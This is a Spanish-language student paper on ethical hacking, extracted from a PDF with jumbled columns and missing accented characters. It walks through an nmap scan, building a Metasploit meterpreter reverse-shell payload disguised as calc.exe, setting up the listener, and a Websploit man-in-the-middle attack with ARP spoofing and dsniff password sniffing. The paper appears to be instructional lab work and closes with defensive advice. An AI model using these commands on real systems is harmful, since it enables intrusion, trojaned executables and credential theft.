Está en la página 1de 6

1

GUA HEURSTICA PARA EXPLOTACIN DE VULNERABILIDADES, APLICADAS EN EL HACKING TICO.


Universidad Tcnica de Ambato (UTA), Ambato - Ecuador
Abstract En este documento se presenta un estudio que muestra los detalles tcnicos del fallo de seguridad de sistemas operativos, en protocolos y puertos, red de datos, la vulnerabilidad implica diferencias en cmo las aplicaciones y software malicioso trabajan como medio comun, es decir que permite la modicacin del cdigo por medio de exploits, siendo esto un fragmento de datos o secuencia de comandos, utilizado con el n de aprovechar una vulnerabilidad de seguridad de un sistema de informacin, comprendiendo esto como el descubrimiento de bugs en sistemas.

Phyton y Ruby, compilados en el manejo de los exploit. Un exploit fue creado, con el n de la explotacin de los procesos, que le da informacin sobre el problema de la vulnerabilidad, el uso de herramientas para poder regular esto no es suciente con respecto a los ataques actualmente presentados, entonces estamos aceptando que los productos de seguridad convencionales son insucientes. Pero hay una salida: mediante la aplicacin de tcnicas de administracin del sistema preventivo o defensor, con el uso de Honeypots y

Index Terms exploit, bug, software malicioso, protocolo, puerto, vulnerabilidad, Distribuciones orientadas a la seguridad informtica, ruby, phyton.

Honeynets.[3] II. M ETODOLOGA

Conceptos Bsicos

I. I NTRODUCCIN El uso de exploits para la identicacin de las vulnerabilidades por medio de bugs, de los sistemas ya sean estos software operativo, aplicaciones, web, entre otros, donde el medio por donde se ejecuta los ataques puede ser un mtodo llamado conexin inversa o el uso de puertos no controlados, fcilmente identicados.[1] Hay que tener en cuenta el uso de IDE de programacin que facilitaran el uso de herramientas de anlisis y las distribuciones orientadas a la seguridad informtica. La explotacin de la estructura y la personalizacin aplicada en todos los niveles de anlisis de software dar una combinacin sin precedentes de precisin y escalabilidad de privilegios en un sistema de informacin.[2] Una temtica amplia donde nos orientaremos a lo que son metasploit, websploit y el uso de IDEs de programacin Bug un defecto de software (computer bug en ingls), es el resultado de un fallo o deciencia durante el proceso de creacin de programas de ordenador o computadora (software). Exploit (del ingls to exploit, explotar o aprovechar) es un programa informtico malicioso, o parte del programa, que trata de forzar alguna deciencia o vulnerabilidad de otro programa. Un agujero de seguridad es un fallo en un programa que permite mediante su explotacin violar la seguridad de un sistema informtico. Puertos y Protocolos normalmente nos referimos a Puertos TCP y UDP, en los casos en que se menciona, denota si el servicio o protocolo utiliza

TCP o UDP. Tunnig linux Es la aplicacin de mejorar al mediante herramientas, utilitarios, aplicaciones para mejorar el rendimiento o presentacin de un S.O. Conexin inversa: Es un metodo de ataque, donde la victima se conecta a un host y puerto especicado para resibir ordenes, comunmente utilizado para saltar rewalls. Una shellcode es un conjunto de rdenes programadas generalmente en lenguaje ensamblador y trasladadas a opciones que suelen ser inyectadas.

Operativo victima Windows 7.

Metasploit.

Como anlisis se utiliza una herramienta conocida que es nmap que sirve para efectuar rastreo de puertos. Nota: "En este caso nmap -O que es escaneo del sistema operativo de barrido en el blanco IP".

root@kaliFIS:~# nmap -O 192.168.1.3

Modalidades Software de pruebas de penetracin ms utilizado del mundo http://www.metasploit.com/

Metasploit: se llama Metasploit Framework porque es todo un entorno de testeo para diversas plataformas, la cual trabaja con libreras, bases de datos, y diversos programas, Shell codes, etc. Como proyecto de seguridad informtica la acogida que tiene metasploit, tiene que ver mucho con la forma de trabajar de ellos open source (cdigo abierto), permitiendo as el manejo variado de esta herramienta como tal.[1] Websploit: es un framework que podemos utilizar para realizar diversos test de seguridad, es una evaluacin de la vulnerabilidad, como rastreador web, es una utilidad de cdigo abierto del sistema de lnea que compone la estructura modular, variante de metasploit.[2] Figura 1.- nmap <target-hosts URL or IP>. Donde nos retornara un poco de informacin de la maquina perteneciente a esa IP. Como preferencia lo que deseamos saber el nmero de puerto, su estado y como dato, adicional el servicio que presenta. Vamos a trabajar sobre este puerto de nuestro host que seria ponde ingresa el cliente: 445/tcp open microsoft-ds "de casualidad se encuentra abierto" Continuando con la metodologa de anlisis, creando un PAYLOAD, especicando para que sistema operativo en nuestro caso va hacer Windows, luego porque nos vamos

Prctica Nota: La prctica a continuacin, fue realizada con una de mis distro favorita de GNU/Linux, basada en Debian, Kaki Linux sucesor de Blacktrack, y como Sistema

a conectar por medio de meterpreter, el sistema como tal no deja rastros y vamos a utilizar uno de los exploit reverce_tcp, procedimientos a seguir: Seteamos IP de nuestro host,

el puerto por donde nos conectamos como cliente, y el archivo en este caso .exe, dependiendo del manejo de archivos es un sin nmero que se puede utilizar, porque lo que se hace en una inyeccin de cdigo malicioso.

esto es solo maldad para este caso. Como evitaramos que este tipo de programas infecten nuestro computador, si el caso de Windows se podra tener un buen antivirus instalador o para el caso de metasploit tener un buen control de los puertos escucha, como

root@kaliFIS:~#

msfpayload

win-

logro esto con el Firewall y las reglas de entrada y salida.[1] Compilara el comando de escucha,

dows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=445 x > /root/Downloads/calc.exe

msf > use exploit/multi/handler

handler es el encargado de administrar y manejar los PAYLOADS, Figura 2.- Compilacin del payload (es la carga de una transmisin de datos). Luego se procede a crear la escucha o modo de espera de conexin. La msfconsole es probablemente la interfaz ms popular de la MSF. Proporciona una consola centralizada "todo en uno" y permite un eciente acceso a prcticamente todas las opciones disponibles en el marco de Metasploit. Msfconsole puede parecer intimidante al principio, pero una vez que aprendas la sintaxis de los comandos usted aprender a apreciar el poder de utilizar esta interfaz. [1] despejado lo resignamos en sesin root@kaliFIS:~# msfconsole msf exploit(handler) > exploit msf exploit(handler) > set lhost 192.168.1.4 msf exploit(handler) > set lport 445 consecutivo lo que establecemos el seteo nuestra IP y el puerto de sesin de nuestro hosts, msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

Figura 4.- handler, mecanismo para determinar si el Figura 3.- Metasploit Project Incrustado el cdigo malicioso dentro de ese programa "calc.exe" lo que se puede hacer con cliente tiene acceso a un recurso particular. Completando la ejecucin de nuestro metasploit, se nota que la facilidad de la creacin, es de fcil interpretacin,

lo nico que falta, es la ejecucin de la aplicacin calc.exe, cabe recalcar que no solo puede ser aplicaciones .exe, sino una variada gama de formas de donde se podr ocultar cdigo malicioso.[3]

Figura 5.- acceso al sistema. La inicial de ellas consiste en recopilar informacin sobre el sistema objetivo y comnmente se le conoce como etapa de reconocimiento. A partir de los datos obtenidos, se tomarn las decisiones acordes y los pasos a seguir en etapas posteriores. Una vez que los datos han sido recopilados y analizados, se procede a la instancia donde se realizar la explotacin sobre el sistema objetivo. La seleccin de los exploits que se utilizarn depender exclusivamente de la informacin obtenida en la etapa anterior. Finalmente, una vez realizado el ataque, se analiza el impacto, posiblemente, se realizarn nuevas acciones a partir de este ltimo.[2] wsf:MITM > set router 192.168.1.1 INTERFACE => eth0 wsf:MITM > set interface eth0 Figura 6.- ayuda del websploit. wsf > use network/mitm Se ingresar este mdulo, vamos a setear nuestra interfaz de red, recuerda que podemos revisar con un simple comando que es ifcong. Corrido setear el host, la IP de a quien vamos sniferar, a continuacin de todo esto ponemos en marcha.

Websploit

ROUTER => 192.168.1.1

wsf:MITM > set target 192.169.1.3 Est incluida tanto en Kali Linux como en su antecesor Backtrack y tambin se puede descargar desde la web ocial del proyecto para instalarla en cualquier otra distribucin de Linux. wsf:MITM > set sniffer dsniff TARGET => 192.169.1.3

root@kaliFIS:~# websploit wsf > show modules

SNIFFER => dsniff

wsf:MITM > runset interface eth0

[*]IP Forwarding ... [*]ARP Spoong ... [*]Sniffer Starting ... dsniff: listening on eth0 Mdulo Network - MiTM En una herramienta como esta, no poda faltar un mdulo para realizar ataques Man In The Middle (network/mitm). Incorpora la posibilidad de usar los siguientes sniffers: Dsniff: Sniff all passwords Msgsnarf: Sniff all text of victim messengers Urlsnarf: Sniff victim links Drifnet: Sniff victim images

este caso, algunas detecciones de intrusos , la conclusin a la que se a llegado despus de estas prcticas, la aplicacin de mtodos de explotacin para la obtencin de informacin, puede ser sosegadamente evitado, con la conguracin avanzada de rewall y antivirus de alta conanza. La eleccin siempre es suya, en cuanto a seguridad, linux ofrece mucha mas estabilidad y manejo del software y hardware, lo cual nos permite mayor exibilidad a la hora de ejecutar rutinas de seguridad, pero cabe destacar que no existe un sistema 100% seguro V. R EFERENCIAS

[1]

M. Aharoni, W. Coppola, D., D. Kennedy, M. Memelli, M. Moser, J. OGorman, D. Ovitz,

Figura 7.- Traco web. Conocer de una herramienta amigable y sencilla aunque limitada por los escasos mdulos incorporados. [2]

C. Perez, Tutorial de Metasploit Framework de Offensive-Securitty [online],2012 , Disponible en: http://ns2.elhacker.net/Manual_de_Metasploit_Unleashed.pdf Karthik R, A Web exploit toolkit reference guide [online],10 October 2012 , Disponible en:

III. R ESULTADOS [3] El modo de consola de metasploit aunque es un poco ms comprometido trabajar con l, suele funcionar de una manera ms rpida y a veces mejor, para ejecutarlo mientras que un websploit contiene un total de 16 mdulos divididos en mdulos web, mdulos de red, mdulos de explotacin y mdulos wi, para realizar pruebas de penetracin, solamente hay que cargar el mdulo en cuestin.

http://media.techtarget.com/rms/pdf/BackTrack%205%20tutorial% Daan van der Sanden, Detecting UDP attacks in high speed networks using packet symmetry with only ow data [online],2008 , Disponible en:

http://www.utwente.nl/ewi/dacs/assignments/completed/master/re sande.pdf

VI. B IOGRAFAS

Figura 8.- Sinopsis. IV. C ONCLUSIONES Metasploit tiene una funcionalidad para encadenar Payloads, con lo que vamos a evitar la deteccin por rmas y, como en

J avier Vargas Naci el 4 de enero de 1992. Sus estudios primarios los realizo en la escuela FRANCISCO FLOR. Sus estudios secundarios los realiz en el INSTITUTO TECNOLGICO SUPERIOR JUAN FRANCISCO MONTALVO. Actualidad Educacin Superior, UNIVERSIDAD TCNICA DE AMBATO, INGENIERA EN SISTEMAS COMPUTACIONALES E INFORMTICOS .